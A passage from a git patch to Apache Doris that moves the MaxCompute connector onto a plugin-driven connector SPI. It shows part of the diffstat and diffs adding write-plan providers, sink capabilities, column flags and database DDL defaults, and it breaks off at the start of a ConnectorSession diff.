.../doris/planner/PluginDrivenTableSink.java | 120 +++ .../java/org/apache/doris/qe/Coordinator.java | 27 +- .../doris/qe/runtime/LoadProcessor.java | 27 +- .../doris/service/FrontendServiceImpl.java | 5 +- .../tablefunction/MetadataGenerator.java | 27 +- .../PartitionValuesTableValuedFunction.java | 4 +- .../PartitionsTableValuedFunction.java | 17 +- .../transaction/CommitDataSerializer.java | 58 ++ .../PluginDrivenTransactionManager.java | 56 +- .../apache/doris/transaction/Transaction.java | 41 + .../TransactionManagerFactory.java | 5 - .../connector/ConnectorSessionImplTest.java | 67 ++ ...leInfoToConnectorRequestConverterTest.java | 90 ++ .../ConnectorTransactionDefaultsTest.java | 74 ++ .../ConnectorColumnConverterTest.java | 22 + .../ExternalMetaCacheRouteResolverTest.java | 6 - ...inDrivenExternalCatalogDdlRoutingTest.java | 618 +++++++++++++ .../PluginDrivenExternalTableEngineTest.java | 124 ++- ...luginDrivenExternalTablePartitionTest.java | 353 ++++++++ .../PluginDrivenScanNodeBatchModeTest.java | 129 +++ .../PluginDrivenScanNodeLimitStripTest.java | 54 ++ ...luginDrivenScanNodePartitionCountTest.java | 100 +++ ...ginDrivenScanNodePartitionPruningTest.java | 109 +++ .../MaxComputeExternalMetaCacheTest.java | 139 --- .../source/MaxComputeScanNodeTest.java | 463 ---------- .../BindConnectorSinkStaticPartitionTest.java | 128 +++ ...ShowPartitionsCommandPluginDrivenTest.java | 103 +++ .../CreateTableInfoEngineCatalogTest.java | 191 ++++ .../InsertOverwriteTableCommandTest.java | 109 +++ .../PluginDrivenInsertExecutorTest.java | 254 ++++++ .../PhysicalConnectorTableSinkTest.java | 258 ++++++ .../PluginDrivenTableSinkBindingTest.java | 109 +++ .../planner/PluginDrivenTableSinkTest.java | 93 ++ .../service/FrontendServiceImplTest.java | 11 +- .../MetadataGeneratorPluginDrivenTest.java | 116 +++ ...nsTableValuedFunctionPluginDrivenTest.java | 135 +++ .../transaction/CommitDataSerializerTest.java | 158 ++++ .../PluginDrivenTransactionManagerTest.java | 241 ++++++ fe/pom.xml | 8 + plan-doc/01-spi-extensions-rfc.md | 20 + plan-doc/HANDOFF.md | 421 +++++++-- plan-doc/PROGRESS.md | 43 +- plan-doc/connectors/maxcompute.md | 31 +- plan-doc/decisions-log.md | 159 ++++ plan-doc/deviations-log.md | 119 ++- .../research/connector-write-spi-recon.md | 144 ++++ .../research/p4-maxcompute-migration-recon.md | 139 +++ .../P4-T06d-FIX-DDL-ENGINE-review-rounds.md | 54 ++ .../P4-T06d-FIX-DDL-REMOTE-review-rounds.md | 43 + .../P4-T06d-FIX-PART-GATES-review-rounds.md | 46 + .../P4-T06d-FIX-READ-DESC-review-rounds.md | 54 ++ .../P4-T06d-FIX-READ-SPLIT-review-rounds.md | 27 + .../P4-T06d-FIX-WRITE-ROWS-review-rounds.md | 23 + ...4-T06e-FIX-AUTOINC-REJECT-review-rounds.md | 37 + ...FIX-BIND-STATIC-PARTITION-review-rounds.md | 78 ++ ...6e-FIX-CREATE-DB-PRECHECK-review-rounds.md | 39 + ...6e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md | 38 + ...P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md | 42 + ...4-T06e-FIX-ISKEY-METADATA-review-rounds.md | 73 ++ ...e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md | 124 +++ ...IX-NONPART-PRUNE-DATALOSS-review-rounds.md | 37 + ...4-T06e-FIX-OVERWRITE-GATE-review-rounds.md | 57 ++ ...4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md | 58 ++ ...6e-FIX-WRITE-DISTRIBUTION-review-rounds.md | 51 ++ ...P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js | 210 +++++ ...4-cutover-completeness-audit-2026-06-08.md | 134 +++ .../reviews/P4-cutover-review-findings.md | 272 ++++++ .../P4-maxcompute-full-rereview-2026-06-07.md | 188 ++++ .../maxcompute-full-rereview.workflow.js | 272 ++++++ .../reviews/prune-pushdown-review.workflow.js | 91 ++ plan-doc/task-list-P4-rereview.md | 66 ++ plan-doc/task-list-batchD-redline-gaps.md | 52 ++ plan-doc/task-list.md | 51 ++ .../tasks/P4-cutover-adversarial-review.md | 108 +++ plan-doc/tasks/P4-maxcompute-migration.md | 140 +++ .../tasks/designs/P4-T03-write-txn-design.md | 98 +++ .../tasks/designs/P4-T04-write-plan-design.md | 152 ++++ .../designs/P4-T05-T06-cutover-design.md | 222 +++++ .../P4-T06c-fe-dispatch-wiring-design.md | 254 ++++++ .../designs/P4-T06d-FIX-DDL-ENGINE-design.md | 248 ++++++ .../designs/P4-T06d-FIX-DDL-REMOTE-design.md | 124 +++ .../designs/P4-T06d-FIX-PART-GATES-design.md | 133 +++ .../designs/P4-T06d-FIX-READ-DESC-design.md | 136 +++ .../designs/P4-T06d-FIX-READ-SPLIT-design.md | 134 +++ .../designs/P4-T06d-FIX-WRITE-ROWS-design.md | 43 + .../P4-T06e-FIX-AGG-COLUMN-REJECT-design.md | 119 +++ .../P4-T06e-FIX-AUTOINC-REJECT-design.md | 319 +++++++ .../P4-T06e-FIX-BATCH-MODE-SPLIT-design.md | 274 ++++++ ...4-T06e-FIX-BIND-STATIC-PARTITION-design.md | 191 ++++ .../P4-T06e-FIX-BLOCKID-CAP-CONFIG-design.md | 149 ++++ .../P4-T06e-FIX-CAST-PUSHDOWN-design.md | 109 +++ ...6e-FIX-CREATE-CATALOG-VALIDATION-design.md | 186 ++++ .../P4-T06e-FIX-CREATE-DB-PRECHECK-design.md | 320 +++++++ .../P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md | 383 ++++++++ ...06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md | 180 ++++ .../P4-T06e-FIX-DROP-DB-FORCE-design.md | 370 ++++++++ .../P4-T06e-FIX-ISKEY-METADATA-design.md | 158 ++++ .../P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md | 248 ++++++ ...-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md | 91 ++ .../P4-T06e-FIX-OVERWRITE-GATE-design.md | 330 +++++++ .../P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md | 73 ++ .../P4-T06e-FIX-PREDICATE-COLGUARD-design.md | 90 ++ .../P4-T06e-FIX-PRUNE-PUSHDOWN-design.md | 120 +++ .../P4-T06e-FIX-VOID-TYPE-MAPPING-design.md | 102 +++ .../P4-T06e-FIX-WRITE-DISTRIBUTION-design.md | 367 ++++++++ .../P4-batchD-maxcompute-removal-design.md | 237 +++++ .../tasks/designs/P4-cutover-fix-design.md | 498 +++++++++++ .../tasks/designs/connector-write-spi-rfc.md | 205 +++++ .../maxcompute/write/test_mc_write_insert.out | 5 + .../test_max_compute_partition_prune.groovy | 34 + .../write/test_mc_write_insert.groovy | 18 + 203 files changed, 19746 insertions(+), 5053 deletions(-) rename fe/{fe-common/src/main/java/org/apache/doris/common => be-java-extensions/max-compute-connector/src/main/java/org/apache/doris}/maxcompute/MCUtils.java (97%) create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorWriteHandle.java rename fe/{fe-core/src/main/java/org/apache/doris/transaction/MCTransactionManager.java => fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorSinkPlan.java} (53%) create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/write/ConnectorWritePlanProvider.java create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorColumnTest.java create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProviderBatchScanTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeWritePlanProvider.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MCTypeMappingTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeBuildTableDescriptorTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataCapabilityTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataIsKeyTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProviderTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransactionTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverterTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProviderTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanRangeTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeValidateColumnsTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsClassloaderIsolationTest.java create mode 100644 fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsLiveConnectivityTest.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalog.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalDatabase.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeSchemaCacheValue.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/McStructureHelper.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeSplit.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundMaxComputeTableSink.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/rules/implementation/LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertCommandContext.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalMaxComputeTableSink.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalMaxComputeTableSink.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/planner/MaxComputeTableSink.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/transaction/CommitDataSerializer.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/fake/ConnectorTransactionDefaultsTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeBatchModeTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeLimitStripTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionCountTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java delete mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCacheTest.java delete mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNodeTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/rules/analysis/BindConnectorSinkStaticPartitionTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoEngineCatalogTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommandTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutorTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSinkTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkBindingTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/tablefunction/MetadataGeneratorPluginDrivenTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/tablefunction/PartitionsTableValuedFunctionPluginDrivenTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/transaction/CommitDataSerializerTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/transaction/PluginDrivenTransactionManagerTest.java create mode 100644 plan-doc/research/connector-write-spi-recon.md create mode 100644 plan-doc/research/p4-maxcompute-migration-recon.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-DDL-ENGINE-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-READ-DESC-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-READ-SPLIT-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-AUTOINC-REJECT-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-CREATE-DB-PRECHECK-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md create mode 100644 plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js create mode 100644 plan-doc/reviews/P4-cutover-completeness-audit-2026-06-08.md create mode 100644 plan-doc/reviews/P4-cutover-review-findings.md create mode 100644 plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md create mode 100644 plan-doc/reviews/maxcompute-full-rereview.workflow.js create mode 100644 plan-doc/reviews/prune-pushdown-review.workflow.js create mode 100644 plan-doc/task-list-P4-rereview.md create mode 100644 plan-doc/task-list-batchD-redline-gaps.md create mode 100644 plan-doc/task-list.md create mode 100644 plan-doc/tasks/P4-cutover-adversarial-review.md create mode 100644 plan-doc/tasks/P4-maxcompute-migration.md create mode 100644 plan-doc/tasks/designs/P4-T03-write-txn-design.md create mode 100644 plan-doc/tasks/designs/P4-T04-write-plan-design.md create mode 100644 plan-doc/tasks/designs/P4-T05-T06-cutover-design.md create mode 100644 plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-DDL-ENGINE-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-DDL-REMOTE-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-PART-GATES-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-READ-DESC-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-READ-SPLIT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06d-FIX-WRITE-ROWS-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-AGG-COLUMN-REJECT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-AUTOINC-REJECT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-BLOCKID-CAP-CONFIG-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-CREATE-CATALOG-VALIDATION-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-CREATE-DB-PRECHECK-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-DROP-DB-FORCE-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-OVERWRITE-GATE-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-PREDICATE-COLGUARD-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-VOID-TYPE-MAPPING-design.md create mode 100644 plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md create mode 100644 plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md create mode 100644 plan-doc/tasks/designs/P4-cutover-fix-design.md create mode 100644 plan-doc/tasks/designs/connector-write-spi-rfc.md diff --git a/fe/fe-common/src/main/java/org/apache/doris/common/maxcompute/MCUtils.java b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MCUtils.java similarity index 97% rename from fe/fe-common/src/main/java/org/apache/doris/common/maxcompute/MCUtils.java rename to fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MCUtils.java index fc7f47fc2689a8..225f953b82e753 100644 --- a/fe/fe-common/src/main/java/org/apache/doris/common/maxcompute/MCUtils.java +++ b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MCUtils.java @@ -15,7 +15,9 @@ // specific language governing permissions and limitations // under the License. -package org.apache.doris.common.maxcompute; +package org.apache.doris.maxcompute; + +import org.apache.doris.common.maxcompute.MCProperties; import com.aliyun.auth.credentials.Credential; import com.aliyun.auth.credentials.provider.EcsRamRoleCredentialProvider; diff --git a/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniScanner.java b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniScanner.java index 336991f3802726..fad4c82a9245da 100644 --- a/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniScanner.java +++ b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniScanner.java @@ -19,7 +19,6 @@ import org.apache.doris.common.jni.JniScanner; import org.apache.doris.common.jni.vec.ColumnType; -import org.apache.doris.common.maxcompute.MCUtils; import com.aliyun.odps.Odps; import com.aliyun.odps.table.configuration.CompressionCodec; diff --git a/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniWriter.java b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniWriter.java index 9788184057ee74..c13d5cdc4f3a9e 100644 --- a/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniWriter.java +++ b/fe/be-java-extensions/max-compute-connector/src/main/java/org/apache/doris/maxcompute/MaxComputeJniWriter.java @@ -21,7 +21,6 @@ import org.apache.doris.common.jni.vec.VectorColumn; import org.apache.doris.common.jni.vec.VectorTable; import org.apache.doris.common.maxcompute.MCProperties; -import org.apache.doris.common.maxcompute.MCUtils; import com.aliyun.odps.Odps; import com.aliyun.odps.OdpsType; diff --git a/fe/be-java-extensions/preload-extensions/pom.xml b/fe/be-java-extensions/preload-extensions/pom.xml index 6ec9b1e6158d7f..7ffc2ea15c3a37 100644 --- a/fe/be-java-extensions/preload-extensions/pom.xml +++ b/fe/be-java-extensions/preload-extensions/pom.xml @@ -62,6 +62,18 @@ under the License. commons-io ${commons-io.version} + + + commons-lang + commons-lang + runtime + org.apache.arrow arrow-memory-unsafe diff --git a/fe/fe-common/pom.xml b/fe/fe-common/pom.xml index 3452c3e596775c..35dc8860944560 100644 --- a/fe/fe-common/pom.xml +++ b/fe/fe-common/pom.xml @@ -134,23 +134,15 @@ under the License. antlr4-runtime ${antlr4.version} + - com.aliyun.odps - odps-sdk-core - - - org.apache.arrow - arrow-vector - - - org.ini4j - ini4j - - - org.bouncycastle - bcprov-jdk18on - - + io.netty + netty-all + + + com.google.protobuf + protobuf-java diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java index cd2b1766adaec2..d53eaa9030dd79 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java @@ -18,6 +18,7 @@ package org.apache.doris.connector.api; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; import java.io.Closeable; import java.io.IOException; @@ -41,6 +42,14 @@ default ConnectorScanPlanProvider getScanPlanProvider() { return null; } + /** + * Returns the write plan provider for sink ({@code TDataSink}) generation, + * or {@code null} if this connector does not support writes. + */ + default ConnectorWritePlanProvider getWritePlanProvider() { + return null; + } + /** Returns the set of capabilities this connector supports. */ default Set getCapabilities() { return Collections.emptySet(); diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java index 53337ed656a3c2..771ae263a3739a 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java @@ -49,6 +49,37 @@ public enum ConnectorCapability { * parallel writers should declare this capability.

*/ SUPPORTS_PARALLEL_WRITE, + /** + * Indicates the connector requires dynamic-partition writes to be hash-distributed by + * partition columns and locally sorted by them before reaching the sink. + * + *

Streaming partition writers (e.g. the MaxCompute Storage API) close the previous + * partition writer as soon as a new partition value appears; un-grouped (unsorted) + * multi-partition rows therefore cause "writer has been closed" errors. The planner uses + * this capability to require a hash-by-partition distribution plus a mandatory local sort + * on the partition columns for dynamic-partition writes.

+ * + *

A connector declaring this is expected to also declare + * {@link #SUPPORTS_PARALLEL_WRITE} (hash distribution is inherently parallel) and + * {@link #SINK_REQUIRE_FULL_SCHEMA_ORDER}: the sink distribution locates partition columns by their + * full-schema position in the child output, which only holds when the bind layer projects the + * write to full-schema order (the projection gated by {@code SINK_REQUIRE_FULL_SCHEMA_ORDER}). A + * connector declaring this without {@code SINK_REQUIRE_FULL_SCHEMA_ORDER} would shuffle/sort by the + * wrong column whenever cols order diverges from the full schema.

+ */ + SINK_REQUIRE_PARTITION_LOCAL_SORT, + /** + * Indicates the connector's write path maps data columns positionally against the full + * table schema (e.g. MaxCompute's columnar Storage API / JNI writer), rather than by column name. + * + *

For such connectors the sink's output rows must be projected to full table schema order + * with any unmentioned columns filled (NULL / default) — exactly like the legacy MaxCompute bind + * path — so that a reordered or partial explicit column list does not land values in the wrong + * remote columns. Name-mapped connectors (e.g. JDBC, which builds an {@code INSERT INTO t (cols)} + * statement) must NOT declare this capability: their data stays in user/cols order to match the + * generated column list.

+ */ + SINK_REQUIRE_FULL_SCHEMA_ORDER, /** * Indicates the connector supports passthrough query via the {@code query()} TVF. * diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java index 5b8b537d0a3841..5012ee63afb484 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java @@ -30,6 +30,8 @@ public final class ConnectorColumn { private final boolean nullable; private final String defaultValue; private final boolean isKey; + private final boolean isAutoInc; + private final boolean isAggregated; public ConnectorColumn(String name, ConnectorType type, String comment, boolean nullable, String defaultValue) { @@ -38,12 +40,25 @@ public ConnectorColumn(String name, ConnectorType type, String comment, public ConnectorColumn(String name, ConnectorType type, String comment, boolean nullable, String defaultValue, boolean isKey) { + this(name, type, comment, nullable, defaultValue, isKey, false); + } + + public ConnectorColumn(String name, ConnectorType type, String comment, + boolean nullable, String defaultValue, boolean isKey, boolean isAutoInc) { + this(name, type, comment, nullable, defaultValue, isKey, isAutoInc, false); + } + + public ConnectorColumn(String name, ConnectorType type, String comment, + boolean nullable, String defaultValue, boolean isKey, boolean isAutoInc, + boolean isAggregated) { this.name = Objects.requireNonNull(name, "name"); this.type = Objects.requireNonNull(type, "type"); this.comment = comment; this.nullable = nullable; this.defaultValue = defaultValue; this.isKey = isKey; + this.isAutoInc = isAutoInc; + this.isAggregated = isAggregated; } public String getName() { @@ -70,6 +85,14 @@ public boolean isKey() { return isKey; } + public boolean isAutoInc() { + return isAutoInc; + } + + public boolean isAggregated() { + return isAggregated; + } + @Override public boolean equals(Object o) { if (this == o) { @@ -81,6 +104,8 @@ public boolean equals(Object o) { ConnectorColumn that = (ConnectorColumn) o; return nullable == that.nullable && isKey == that.isKey + && isAutoInc == that.isAutoInc + && isAggregated == that.isAggregated && name.equals(that.name) && type.equals(that.type) && Objects.equals(comment, that.comment) @@ -89,7 +114,7 @@ public boolean equals(Object o) { @Override public int hashCode() { - return Objects.hash(name, type, comment, nullable, defaultValue, isKey); + return Objects.hash(name, type, comment, nullable, defaultValue, isKey, isAutoInc, isAggregated); } @Override diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSchemaOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSchemaOps.java index addb6d929ac20f..da6bfeac408266 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSchemaOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSchemaOps.java @@ -44,6 +44,16 @@ default ConnectorDatabaseMetadata getDatabase( "getDatabase not implemented"); } + /** + * Whether this connector supports CREATE DATABASE. Defaults to false so the FE + * {@code CREATE DATABASE IF NOT EXISTS} remote existence precheck applies only to + * connectors that can actually create databases; connectors that cannot keep their + * existing "CREATE DATABASE not supported" behavior unchanged. + */ + default boolean supportsCreateDatabase() { + return false; + } + /** Creates a new database with the given name and properties. */ default void createDatabase(ConnectorSession session, String dbName, Map properties) { @@ -57,4 +67,15 @@ default void dropDatabase(ConnectorSession session, throw new DorisConnectorException( "DROP DATABASE not supported"); } + + /** + * Drops the specified database, cascading to its tables when {@code force} is + * true. The default delegates to the non-cascading 3-arg form, so connectors + * that do not support cascade keep their current behavior with zero change; + * a connector that supports FORCE overrides this overload. + */ + default void dropDatabase(ConnectorSession session, + String dbName, boolean ifExists, boolean force) { + dropDatabase(session, dbName, ifExists); + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java index 67324987ffd0d4..5e151ccb7da4eb 100644 --- 